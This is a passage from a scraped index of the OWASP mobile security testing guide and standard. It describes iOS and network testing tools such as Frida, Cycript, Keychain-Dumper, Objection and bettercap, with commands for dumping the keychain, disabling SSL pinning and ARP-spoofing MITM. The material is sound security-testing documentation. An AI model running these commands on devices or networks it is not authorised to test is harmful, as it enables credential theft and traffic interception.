Start Cydia and add Frida's repository by navigating to Manage -> Sources -> Edit -> Add and entering https://build.frida.re. You should then be able to find and install the Frida package.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#using-frida-on-ios","title":"Using Frida on iOS","text":"Connect your device via USB and make sure that Frida works by running the frida-ps
command and the flag '-U'. This should return the list of processes running on the device:
$ frida-ps -U\nPID Name\n--- ----------------\n963 Mail\n952 Safari\n416 BTServer\n422 BlueTool\n791 CalendarWidget\n451 CloudKeychainPro\n239 CommCenter\n764 ContactsCoreSpot\n(...)\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#frida-bindings","title":"Frida Bindings","text":"In order to extend the scripting experience, Frida offers bindings to programming languages such as Python, C, NodeJS, and Swift.
Taking Python as an example, the first thing to note is that no further installation steps are required. Start your Python script with import frida
and you're ready to go. See the following script that simply runs the previous JavaScript snippet:
# frida_python.py\nimport frida\n\nsession = frida.get_usb_device().attach('com.android.chrome')\n\nsource = \"\"\"\nJava.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n console.log(methods[i].toString());\n }\n});\n\"\"\"\n\nscript = session.create_script(source)\nscript.load()\n\nsession.detach()\n
In this case, running the Python script (python3 frida_python.py
) has the same result as the previous example: it will print all methods of the android.view.View
class to the terminal. However, you might want to work with that data from Python. Using send
instead of console.log
will send data in JSON format from JavaScript to Python. Please read the comments in the example below:
# python3 frida_python_send.py\nimport frida\n\nsession = frida.get_usb_device().attach('com.android.chrome')\n\n# 1. we want to store method names inside a list\nandroid_view_methods = []\n\nsource = \"\"\"\nJava.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n send(methods[i].toString());\n }\n});\n\"\"\"\n\nscript = session.create_script(source)\n\n# 2. this is a callback function, only method names containing \"Text\" will be appended to the list\ndef on_message(message, data):\n if \"Text\" in message['payload']:\n android_view_methods.append(message['payload'])\n\n# 3. we tell the script to run our callback each time a message is received\nscript.on('message', on_message)\n\nscript.load()\n\n# 4. we do something with the collected data, in this case we just print it\nfor method in android_view_methods:\n print(method)\n\nsession.detach()\n
This effectively filters the methods and prints only the ones containing the string \"Text\":
$ python3 frida_python_send.py\npublic boolean android.view.View.canResolveTextAlignment()\npublic boolean android.view.View.canResolveTextDirection()\npublic void android.view.View.setTextAlignment(int)\npublic void android.view.View.setTextDirection(int)\npublic void android.view.View.setTooltipText(java.lang.CharSequence)\n...\n
In the end, it is up to you to decide where would you like to work with the data. Sometimes it will be more convenient to do it from JavaScript and in other cases Python will be the best choice. Of course you can also send messages from Python to JavaScript by using script.post
. Refer to the Frida docs for more information about sending and receiving messages.
By running MobSF locally on a macOS host you'll benefit from a slightly better class-dump output.
Once you have MobSF up and running you can open it in your browser by navigating to http://127.0.0.1:8000. Simply drag the IPA you want to analyze into the upload area and MobSF will start its job.
After MobSF is done with its analysis, you will receive a one-page overview of all the tests that were executed. The page is split up into multiple sections giving some first hints on the attack surface of the application.
The following is displayed:
Info.plist
file.Info.plist
which give some hints on the app's permissions.In contrast to the Android use case, MobSF does not offer any dynamic analysis features for iOS apps.
Refer to MobSF documentation for more details.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0041/","title":"nm - iOS","text":"nm is a tool that displays the name list (symbol table) of the given binary. You can find here more information for for iOS.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0042/","title":"BinaryCookieReader","text":"A tool to dump all the cookies from the binary Cookies.binarycookies file - https://github.com/as0ler/BinaryCookieReader/blob/master/BinaryCookieReader.py
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0043/","title":"class-dump","text":"class-dump by Steve Nygard is a command line utility for examining the Objective-C runtime information stored in Mach-O (Mach object) files. It generates declarations for the classes, categories, and protocols.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0044/","title":"class-dump-z","text":"class-dump-z is class-dump re-written from scratch in C++, avoiding the use of dynamic calls. Removing these unnecessary calls makes class-dump-z nearly 10 times faster than its predecessor.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0045/","title":"class-dump-dyld","text":"class-dump-dyld by Elias Limneos allows symbols to be dumped and retrieved directly from the shared cache, eliminating the necessity of extracting the files first. It can generate header files from app binaries, libraries, frameworks, bundles, or the whole dyld_shared_cache. Directories or the entirety of dyld_shared_cache can be recursively mass-dumped.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0046/","title":"Cycript","text":"Cydia Substrate (formerly called MobileSubstrate) is the standard framework for developing Cydia runtime patches (the so-called \"Cydia Substrate Extensions\") on iOS. It comes with Cynject, a tool that provides code injection support for C.
Cycript is a scripting language developed by Jay Freeman (aka Saurik). It injects a JavaScriptCore VM into a running process. Via the Cycript interactive console, users can then manipulate the process with a hybrid Objective-C++ and JavaScript syntax. Accessing and instantiating Objective-C classes inside a running process is also possible.
In order to install Cycript, first download, unpack, and install the SDK.
#on iphone\n$ wget https://cydia.saurik.com/api/latest/3 -O cycript.zip && unzip cycript.zip\n$ sudo cp -a Cycript.lib/*.dylib /usr/lib\n$ sudo cp -a Cycript.lib/cycript-apl /usr/bin/cycript\n
To spawn the interactive Cycript shell, run \"./cycript\" or \"cycript\" if Cycript is on your path.
$ cycript\ncy#\n
To inject into a running process, we first need to find the process ID (PID). Run the application and make sure the app is in the foreground. Running cycript -p <PID>
injects Cycript into the process. To illustrate, we will inject into SpringBoard (which is always running).
$ ps -ef | grep SpringBoard\n501 78 1 0 0:00.00 ?? 0:10.57 /System/Library/CoreServices/SpringBoard.app/SpringBoard\n$ ./cycript -p 78\ncy#\n
One of the first things you can try out is to get the application instance (UIApplication
), you can use Objective-C syntax:
cy# [UIApplication sharedApplication]\ncy# var a = [UIApplication sharedApplication]\n
Use that variable now to get the application's delegate class:
cy# a.delegate\n
Let's try to trigger an alert message on SpringBoard with Cycript.
cy# alertView = [[UIAlertView alloc] initWithTitle:@\"OWASP MASTG\" message:@\"Mobile Application Security Testing Guide\" delegate:nil cancelButtonitle:@\"OK\" otherButtonTitles:nil]\n#\"<UIAlertView: 0x1645c550; frame = (0 0; 0 0); layer = <CALayer: 0x164df160>>\"\ncy# [alertView show]\ncy# [alertView release]\n
Find the app's document directory with Cycript:
cy# [[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask][0]\n#\"file:///var/mobile/Containers/Data/Application/A8AE15EE-DC8B-4F1C-91A5-1FED35212DF/Documents/\"\n
The command [[UIApp keyWindow] recursiveDescription].toString()
returns the view hierarchy of keyWindow
. The description of every subview and sub-subview of keyWindow
is shown. The indentation space reflects the relationships between views. For example, UILabel
, UITextField
, and UIButton
are subviews of UIView
.
cy# [[UIApp keyWindow] recursiveDescription].toString()\n`<UIWindow: 0x16e82190; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 0x16e80ac0>; layer = <UIWindowLayer: 0x16e63ce0>>\n | <UIView: 0x16e935f0; frame = (0 0; 320 568); autoresize = W+H; layer = <CALayer: 0x16e93680>>\n | | <UILabel: 0x16e8f840; frame = (0 40; 82 20.5); text = 'i am groot!'; hidden = YES; opaque = NO; autoresize = RM+BM; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e8f920>>\n | | <UILabel: 0x16e8e030; frame = (0 110.5; 320 20.5); text = 'A Secret Is Found In The ...'; opaque = NO; autoresize = RM+BM; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e8e290>>\n | | <UITextField: 0x16e8fbd0; frame = (8 141; 304 30); text = ''; clipsToBounds = YES; opaque = NO; autoresize = RM+BM; gestureRecognizers = <NSArray: 0x16e94550>; layer = <CALayer: 0x16e8fea0>>\n | | | <_UITextFieldRoundedRectBackgroundViewNeue: 0x16e92770; frame = (0 0; 304 30); opaque = NO; autoresize = W+H; userInteractionEnabled = NO; layer = <CALayer: 0x16e92990>>\n | | <UIButton: 0x16d901e0; frame = (8 191; 304 30); opaque = NO; autoresize = RM+BM; layer = <CALayer: 0x16d90490>>\n | | | <UIButtonLabel: 0x16e72b70; frame = (133 6; 38 18); text = 'Verify'; opaque = NO; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e974b0>>\n | | <_UILayoutGuide: 0x16d92a00; frame = (0 0; 0 20); hidden = YES; layer = <CALayer: 0x16e936b0>>\n | | <_UILayoutGuide: 0x16d92c10; frame = (0 568; 0 0); hidden = YES; layer = <CALayer: 0x16d92cb0>>`\n
You can also use Cycript's built-in functions such as choose
which searches the heap for instances of the given Objective-C class:
cy# choose(SBIconModel)\n[#\"<SBIconModel: 0x1590c8430>\"]\n
Learn more in the Cycript Manual.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0047/","title":"Cydia","text":"Cydia is an alternative app store developed by Jay Freeman (aka \"saurik\") for jailbroken devices. It provides a graphical user interface and a version of the Advanced Packaging Tool (APT). You can easily access many \"unsanctioned\" app packages through Cydia. Most jailbreaks install Cydia automatically.
Many tools on a jailbroken device can be installed by using Cydia, which is the unofficial AppStore for iOS devices and allows you to manage repositories. In Cydia you should add (if not already done by default) the following repositories by navigating to Sources -> Edit, then clicking Add in the top left:
In case you are using the Sileo App Store, please keep in mind that the Sileo Compatibility Layer shares your sources between Cydia and Sileo, however, Cydia is unable to remove sources added in Sileo, and Sileo is unable to remove sources added in Cydia. Keep this in mind when you\u2019re trying to remove sources.
After adding all the suggested repositories above you can install the following useful packages from Cydia to get started:
installipa
and ipainstaller
which are both the same.Besides Cydia you can also ssh into your iOS device and you can install the packages directly via apt-get, like for example adv-cmds.
apt-get update\napt-get install adv-cmds\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0048/","title":"dsdump","text":"dsdump is a tool to dump Objective-C classes and Swift type descriptors (classes, structs, enums). It only supports Swift version 5 or higher and does not support ARM 32-bit binaries.
The following example shows how you can dump Objective-C classes and Swift type descriptors of an iOS application.
First verify if the app's main binary is a FAT binary containing ARM64:
$ otool -hv [APP_MAIN_BINARY_FILE]\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n MH_MAGIC ARM V7 0x00 EXECUTE 39 5016 NOUNDEFS DYLDLINK TWOLEVEL PIE\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\nMH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 38 5728 NOUNDEFS DYLDLINK TWOLEVEL PIE\n
If yes, then we specify the \"--arch\" parameter to \"arm64\", otherwise it is not needed if the binary only contains an ARM64 binary.
# Dump the Objective-C classes to a temporary file\n$ dsdump --objc --color --verbose=5 --arch arm64 --defined [APP_MAIN_BINARY_FILE] > /tmp/OBJC.txt\n\n# Dump the Swift type descriptors to a temporary file if the app is implemented in Swift\n$ dsdump --swift --color --verbose=5 --arch arm64 --defined [APP_MAIN_BINARY_FILE] > /tmp/SWIFT.txt\n
You can find more information about the inner workings of dsdump and how to programmatically inspect a Mach-O binary to display the compiled Swift types and Objective-C classes in this article.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0049/","title":"Frida-cycript","text":"A fork of Cycript including a brand new runtime called Mj\u00f8lner powered by Frida. This enables frida-cycript to run on all the platforms and architectures maintained by frida-core - https://github.com/nowsecure/frida-cycript
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0050/","title":"Frida-ios-dump","text":"Frida-ios-dump is a Python script that helps you retrieve the decrypted version of an iOS app (IPA) from an iOS device. It supports both Python 2 and Python 3 and requires Frida running on your iOS device (jailbroken or not). This tool uses Frida's Memory API to dump the memory of the running app and recreate an IPA file. Because the code is extracted from memory, it is automatically decrypted.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0050/#alternatives","title":"Alternatives","text":"Bagbak is a Node.js script that decrypts the entire application, including its extensions. It serves the same purpose as frida-ios-dump, but you might find it easier to set up and more convenient for regular use.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0051/","title":"gdb","text":"A tool to perform runtime analysis of iOS applications - https://cydia.radare.org/pool/main/g/gdb/
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0053/","title":"iOSbackup","text":"iOSbackup
is a Python 3 class that reads and extracts files from a password-encrypted iOS backup created by iTunes on Mac and Windows.
With ios-deploy you can install and debug iOS apps from the command line, without using Xcode. It can be installed via brew on macOS:
brew install ios-deploy\n
Alternatively:
git clone https://github.com/ios-control/ios-deploy.git\ncd ios-deploy/\nxcodebuild\ncd build/Release\n./ios-deploy\nln -s <your-path-to-ios-deploy>/build/Release/ios-deploy /usr/local/bin/ios-deploy\n
The last line creates a symbolic link and makes the executable available system-wide. Reload your shell to make the new commands available:
zsh: # . ~/.zshrc\nbash: # . ~/.bashrc\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0055/","title":"iProxy","text":"A tool used to connect via SSH to a jailbroken iPhone via USB - https://github.com/tcurdt/iProxy
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0056/","title":"Keychain-Dumper","text":"Keychain-dumper is an iOS tool to check which keychain items are available to an attacker once an iOS device has been jailbroken. The easiest way to get the tool is to download the binary from its GitHub repo and run it from your device:
$ git clone https://github.com/ptoomey3/Keychain-Dumper\n$ scp -P 2222 Keychain-Dumper/keychain_dumper root@localhost:/tmp/\n$ ssh -p 2222 root@localhost\niPhone:~ root# chmod +x /tmp/keychain_dumper\niPhone:~ root# /tmp/keychain_dumper\n
For usage instructions please refer to the Keychain-dumper GitHub page.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0057/","title":"lldb","text":"A debugger by Apple's Xcode used for debugging iOS applications - https://lldb.llvm.org/
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0058/","title":"MachoOView","text":"MachoOView is a useful visual Mach-O file browser that also allows in-file editing of ARM binaries.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0059/","title":"optool","text":"optool is a tool which interfaces with MachO binaries in order to insert/remove load commands, strip code signatures, resign, and remove aslr.
To install it:
git clone https://github.com/alexzielenski/optool.git\ncd optool/\ngit submodule update --init --recursive\nxcodebuild\nln -s <your-path-to-optool>/build/Release/optool /usr/local/bin/optool\n
The last line creates a symbolic link and makes the executable available system-wide. Reload your shell to make the new commands available:
zsh: # . ~/.zshrc\nbash: # . ~/.bashrc\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0060/","title":"otool","text":"otool is a tool for displaying specific parts of object files or libraries. It works with Mach-O files and universal file formats.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0061/","title":"Grapefruit","text":"Grapefruit is an iOS app assessment tool that is using the Frida server on the iOS device and is abstracting many penetration testing tasks into a Web UI. It can be installed via npm
.
$ npm install -g igf\n$ grapefruit\nlistening on http://localhost:31337\n
When you execute the command grapefruit
a local server will be started on port 31337. Connect your jailbroken device with the Frida server running, or a non-jailbroken device with a repackaged app including Frida to your machine via USB. Once you click on the \"iPhone\" icon you will get an overview of all installed apps.
With Grapfruit it's possible to explore different kinds of information concerning an iOS app. Once you selected the iOS app you can perform many tasks such as:
A program that can convert .plist files between a binary version and an XML version - https://www.theiphonewiki.com/wiki/Plutil
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0063/","title":"security","text":"security
is a macOS command to administer Keychains, keys, certificates and the Security framework.
Since iOS 11 jailbreaks are introducing Sileo, which is a new jailbreak app-store for iOS devices. The jailbreak Chimera for iOS 12 is also relying on Sileo as a package manager.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0065/","title":"simctl","text":"simctl is an Xcode tool that allows you to interact with iOS simulators via the command line to e.g. manage simulators, launch apps, take screenshots or collect their logs.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0066/","title":"SSL Kill Switch 3","text":"Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and macOS Apps - https://github.com/NyaMisty/ssl-kill-switch3
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0067/","title":"swift-demangle","text":"swift-demangle is an Xcode tool that demangles Swift symbols. For more information run xcrun swift-demangle -help
once installed.
SwiftShield is a tool that generates irreversible, encrypted names for your iOS project's objects (including your Pods and Storyboards). This raises the bar for reverse engineers and will produce less helpful output when using reverse engineering tools such as class-dump and Frida.
Warning: SwiftShield irreversibly overwrites all your source files. Ideally, you should have it run only on your CI server, and on release builds.
A sample Swift project is used to demonstrate the usage of SwiftShield.
/usr/local/bin
:cp swiftshield/swiftshield /usr/local/bin/\n
$ cd SwiftSecurity\n$ swiftshield -automatic -project-root . -automatic-project-file SwiftSecurity.xcodeproj -automatic-project-scheme SwiftSecurity\nSwiftShield 3.4.0\nAutomatic mode\nBuilding project to gather modules and compiler arguments...\n-- Indexing ReverseEngineeringToolsChecker.swift --\nFound declaration of ReverseEngineeringToolsChecker (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC)\nFound declaration of amIReverseEngineered (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC20amIReverseEngineeredSbyFZ)\nFound declaration of checkDYLD (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC9checkDYLD33_D6FE91E9C9AEC4D13973F8ABFC1AC788LLSbyFZ)\nFound declaration of checkExistenceOfSuspiciousFiles (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC31checkExistenceOfSuspiciousFiles33_D6FE91E9C9AEC4D13973F8ABFC1AC788LLSbyFZ)\n...\n
SwiftShield is now detecting class and method names and is replacing their identifier with an encrypted value.
In the original source code you can see all the class and method identifiers:
SwiftShield was now replacing all of them with encrypted values that leave no trace to their original name or intention of the class/method:
After executing swiftshield
a new directory will be created called swiftshield-output
. In this directory another directory is created with a timestamp in the folder name. This directory contains a text file called conversionMap.txt
, that maps the encrypted strings to their original values.
$ cat conversionMap.txt\n//\n// SwiftShield Conversion Map\n// Automatic mode for SwiftSecurity, 2020-01-02 13.51.03\n// Deobfuscate crash logs (or any text file) by running:\n// swiftshield -deobfuscate CRASH_FILE -deobfuscate_map THIS_FILE\n//\n\nViewController ===> hTOUoUmUcEZUqhVHRrjrMUnYqbdqWByU\nviewDidLoad ===> DLaNRaFbfmdTDuJCPFXrGhsWhoQyKLnO\nsceneDidBecomeActive ===> SUANAnWpkyaIWlGUqwXitCoQSYeVilGe\nAppDelegate ===> KftEWsJcctNEmGuvwZGPbusIxEFOVcIb\nDeny_Debugger ===> lKEITOpOvLWCFgSCKZdUtpuqiwlvxSjx\nButton_Emulator ===> akcVscrZFdBBYqYrcmhhyXAevNdXOKeG\n
This is needed for deobfuscating encrypted crash logs.
Another example project is available in SwiftShield's Github repo, that can be used to test the execution of SwiftShield.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0069/","title":"Usbmuxd","text":"usbmuxd is a socket daemon that monitors USB iPhone connections. You can use it to map the mobile device's localhost listening sockets to TCP ports on your host computer. This allows you to conveniently SSH into your iOS device without setting up an actual network connection. When usbmuxd detects an iPhone running in normal mode, it connects to the phone and begins relaying requests that it receives via /var/run/usbmuxd
.
Xcode is an Integrated Development Environment (IDE) for macOS that contains a suite of tools for developing software for macOS, iOS, watchOS, and tvOS. You can download Xcode for free from the official Apple website. Xcode will offer you different tools and functions to interact with an iOS device that can be helpful during a penetration test, such as analyzing logs or sideloading of apps.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0071/","title":"Xcode Command Line Tools","text":"After installing Xcode, in order to make all development tools available systemwide, it is recommended to install the Xcode Command Line Tools package. This will be handy during testing of iOS apps as some of the tools (e.g. objection) are also relying on the availability of this package. You can download it from the official Apple website or install it straight away from your terminal:
xcode-select --install\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0072/","title":"xcrun","text":"xcrun
can be used invoke Xcode developer tools from the command-line, without having them in the path. For example you may want to use it to locate and run swift-demangle or simctl.
Radare2 is a complete framework for reverse-engineering and analyzing binaries. The installation instructions can be found in the GitHub repository. To learn more on radare2 you may want to read the official radare2 book.
Learn more:
Objection offers several features specific to iOS. You can find the full list of features on the project's page, but here are a few interesting ones:
All these tasks and more can be easily done by using the commands in objection's REPL. For example, you can obtain the classes used in an app, functions of classes or information about the bundles of an app by running:
OWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios hooking list classes\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios hooking list class_methods <ClassName>\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios bundles list_bundles\n
If you have a jailbroken device with frida-server installed, Objection can connect directly to the running Frida server to provide all its functionality without needing to repackage the application. However, it is not always possible to jailbreak the latest version of iOS, or you may have an application with advanced jailbreak detection mechanisms.
The ability to perform advanced dynamic analysis on non-jailbroken devices is one of the features that makes Objection incredibly useful. After following the repackaging process you will be able to run all the aforementioned commands which make it very easy to quickly analyze an application, or get around basic security controls.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0074/#using-objection-on-ios","title":"Using Objection on iOS","text":"Starting up Objection depends on whether you've patched the IPA or whether you are using a jailbroken device running Frida-server. For running a patched IPA, objection will automatically find any attached devices and search for a listening Frida gadget. However, when using frida-server, you need to explicitly tell frida-server which application you want to analyze.
# Connecting to a patched IPA\n$ objection explore\n\n# Using frida-ps to get the correct application name\n$ frida-ps -Ua | grep -i Telegram\n983 Telegram\n\n# Connecting to the Telegram app through Frida-server\n$ objection --gadget=\"Telegram\" explore\n
Once you are in the Objection REPL, you can execute any of the available commands. Below is an overview of some of the most useful ones:
# Show the different storage locations belonging to the app\n$ env\n\n# Disable popular ssl pinning methods\n$ ios sslpinning disable\n\n# Dump the Keychain\n$ ios keychain dump\n\n# Dump the Keychain, including access modifiers. The result will be written to the host in myfile.json\n$ ios keychain dump --json <myfile.json>\n\n# Show the content of a plist file\n$ ios plist cat <myfile.plist>\n
More information on using the Objection REPL can be found on the Objection Wiki
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0101/","title":"codesign","text":"The codesign tool is primarily used to create, verify, and display code signatures, and to query the dynamic status of signed code in the system. Although Xcode typically automates the process of signing code during builds and before distribution, there are scenarios where manual intervention with codesign is required. This can include inspecting or verifying the details of an app's code signature, or manually re-signing an app. For more detailed tasks such as these, you can use the codesign command line tool directly, as described in Apple's Code Signing Guide.
Learn more:
A command line packet capture utility for Android.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0076/","title":"bettercap","text":"A powerful framework which aims to offer to security researchers and reverse engineers an easy to use, all-in-one solution for Wi-Fi, Bluetooth Low Energy, wireless HID hijacking and Ethernet networks reconnaissance. It can be used during network penetration tests in order to simulate a man-in-the-middle (MITM) attack. This is achieved by executing ARP poisoning or spoofing to the target computers. When such an attack is successful, all packets between two computers are redirected to a third computer that acts as the man-in-the-middle and is able to intercept the traffic for analysis.
bettercap is a powerful tool to execute MITM attacks and should be preferred nowadays, instead of ettercap. See also Why another MITM tool? on the bettercap site.
bettercap is available for all major Linux and Unix operating systems and should be part of their respective package installation mechanisms. You need to install it on your host computer that will act as the MITM. On macOS it can be installed by using brew.
brew install bettercap\n
For Kali Linux you can install bettercap with apt-get
:
apt-get update\napt-get install bettercap\n
There are installation instructions as well for Ubuntu Linux 18.04 on LinuxHint.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0077/","title":"Burp Suite","text":"Burp Suite is an integrated platform for performing security testing mobile and web applications.
Its tools work together seamlessly to support the entire testing process, from initial mapping and analysis of attack surfaces to finding and exploiting security vulnerabilities. Burp Proxy operates as a web proxy server for Burp Suite, which is positioned as a man-in-the-middle between the browser and web servers. Burp Suite allows you to intercept, inspect, and modify incoming and outgoing raw HTTP traffic.
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your device and host computer are connected to a Wi-Fi network that permits client-to-client traffic.
PortSwigger provides good tutorials on setting up both Android as iOS devices to work with Burp:
Please refer to the section \"Setting up an Interception Proxy\" in the Android and iOS \"Basic Security Testing\" chapters for more information.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0078/","title":"MITM Relay","text":"A script to intercept and modify non-HTTP protocols through Burp and others with support for SSL and STARTTLS interception - https://github.com/jrmdev/mitm_relay
"},{"location":"MASTG/tools/network/MASTG-TOOL-0079/","title":"OWASP ZAP","text":"OWASP ZAP (Zed Attack Proxy) is a free security tool which helps to automatically find security vulnerabilities in web applications and web services.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0080/","title":"tcpdump","text":"A command line packet capture utility - https://www.tcpdump.org/
"},{"location":"MASTG/tools/network/MASTG-TOOL-0081/","title":"Wireshark","text":"An open-source packet analyzer - https://www.wireshark.org/download.html
"},{"location":"MASTG/tools/network/MASTG-TOOL-0097/","title":"mitmproxy","text":"mitmproxy is a free and open source interactive HTTPS intercepting proxy.
mitmdump
is the command-line version of mitmproxy. Think tcpdump for HTTP. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols. You can prettify and decode a variety of message types ranging from HTML to Protobuf, intercept specific messages on-the-fly, modify them before they reach their destination, and replay them to a client or server later on.mitmweb
is a web-based interface for mitmproxy. It gives you a similar experience as in Chrome's DevTools, plus additional features such as request interception and replay.brew install mitmproxy\n
The installation instructions are here.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0097/#usage","title":"Usage","text":"The documentation is here. Mitmproxy starts as a regular HTTP proxy by default and listens on http://localhost:8080
. You need to configure your browser or device to route all traffic through mitmproxy. For example, on Android emulator you need to follow the steps indicated here.
For example, to capture all traffic to a file:
mitmdump -w outfile\n
This runs mitmproxy with the add_header.py script, which simply adds a new header to all responses.
mitmdump -s add_header.py\n
"},{"location":"MASVS/","title":"OWASP MASVS","text":"GitHub Repo
The OWASP MASVS (Mobile Application Security Verification Standard) is the industry standard for mobile app security. It can be used by mobile software architects and developers seeking to develop secure mobile applications, as well as security testers to ensure completeness and consistency of test results.
Download the MASVS
Starting with MASVS v2.0.0, translations will no longer be included to focus on the development of MASTG v2.0.0. We encourage the community to create and maintain their own translations. Thank you to all the past translators who generously volunteered their time and expertise to make the MASVS accessible to non-English speaking communities. We truly appreciate your contributions and hope to continue working together in the future. The past MASVS v1.5.0 translations are still available in the MASVS repo.
"},{"location":"MASVS/#the-masvs-control-groups","title":"The MASVS Control Groups","text":"The standard is divided into various groups of controls, labeled MASVS-XXXXX, that represent the most critical areas of the mobile attack surface:
To complement the MASVS, the OWASP MAS project also provides the OWASP Mobile Application Security Testing Guide (MASTG) and the OWASP MAS Checklist which together are the perfect companion for verifying the controls listed in the OWASP MASVS and demonstrate compliance.
MAS Testing Profiles
Starting on v2.0.0 the MASVS does not contain \"verification levels\". The MAS project has traditionally provided three verification levels (L1, L2 and R), which were revisited during the MASVS refactoring in 2023, and have been reworked as \"MAS Testing Profiles\" and moved over to the OWASP MASTG. While we move things around and as a temporary measure, the OWASP MAS Checklist will still contain the old verification levels, associated with the current MASTG v1 tests. However, note that the levels will be completely reworked and reassigned to the corresponding MASTG tests in the next release.
"},{"location":"MASVS/05-MASVS-STORAGE/","title":"MASVS-STORAGE: Storage","text":"Mobile applications handle a wide variety of sensitive data, such as personally identifiable information (PII), cryptographic material, secrets, and API keys, that often need to be stored locally. This sensitive data may be stored in private locations, such as the app's internal storage, or in public folders that are accessible by the user or other apps installed on the device. However, sensitive data can also be unintentionally stored or exposed to publicly accessible locations, typically as a side-effect of using certain APIs or system capabilities such as backups or logs.
This category is designed to help developers ensure that any sensitive data intentionally stored by the app is properly protected, regardless of the target location. It also covers unintentional leaks that can occur due to improper use of APIs or system capabilities.
"},{"location":"MASVS/06-MASVS-CRYPTO/","title":"MASVS-CRYPTO: Cryptography","text":"Cryptography is essential for mobile apps because mobile devices are highly portable and can be easily lost or stolen. This means that an attacker who gains physical access to a device can potentially access all the sensitive data stored on it, including passwords, financial information, and personally identifiable information. Cryptography provides a means of protecting this sensitive data by encrypting it so that it cannot be easily read or accessed by an unauthorized user.
The purpose of the controls in this category is to ensure that the verified app uses cryptography according to industry best practices, which are typically defined in external standards such as NIST.SP.800-175B and NIST.SP.800-57. This category also focuses on the management of cryptographic keys throughout their lifecycle, including key generation, storage, and protection. Poor key management can compromise even the strongest cryptography, so it is crucial for developers to follow the recommended best practices to ensure the security of their users' sensitive data.
"},{"location":"MASVS/07-MASVS-AUTH/","title":"MASVS-AUTH: Authentication and Authorization","text":"Authentication and authorization are essential components of most mobile apps, especially those that connect to a remote service. These mechanisms provide an added layer of security and help prevent unauthorized access to sensitive user data. Although the enforcement of these mechanisms must be on the remote endpoint, it is equally important for the app to follow relevant best practices to ensure the secure use of the involved protocols.
Mobile apps often use different forms of authentication, such as biometrics, PIN, or multi-factor authentication code generators, to validate user identity. These mechanisms must be implemented correctly to ensure their effectiveness in preventing unauthorized access. Additionally, some apps may rely solely on local app authentication and may not have a remote endpoint. In such cases, it is critical to ensure that local authentication mechanisms are secure and implemented following industry best practices.
The controls in this category aim to ensure that the app implements authentication and authorization mechanisms securely, protecting sensitive user information and preventing unauthorized access. It is important to note that the security of the remote endpoint should also be validated using industry standards such as the OWASP Application Security Verification Standard (ASVS).
"},{"location":"MASVS/08-MASVS-NETWORK/","title":"MASVS-NETWORK: Network Communication","text":"Secure networking is a critical aspect of mobile app security, particularly for apps that communicate over the network. In order to ensure the confidentiality and integrity of data in transit, developers typically rely on encryption and authentication of the remote endpoint, such as through the use of TLS. However, there are numerous ways in which a developer may accidentally disable the platform secure defaults or bypass them entirely by utilizing low-level APIs or third-party libraries.
This category is designed to ensure that the mobile app sets up secure connections under any circumstances. Specifically, it focuses on verifying that the app establishes a secure, encrypted channel for network communication. Additionally, this category covers situations where a developer may choose to trust only specific Certificate Authorities (CAs), which is commonly referred to as certificate pinning or public key pinning.
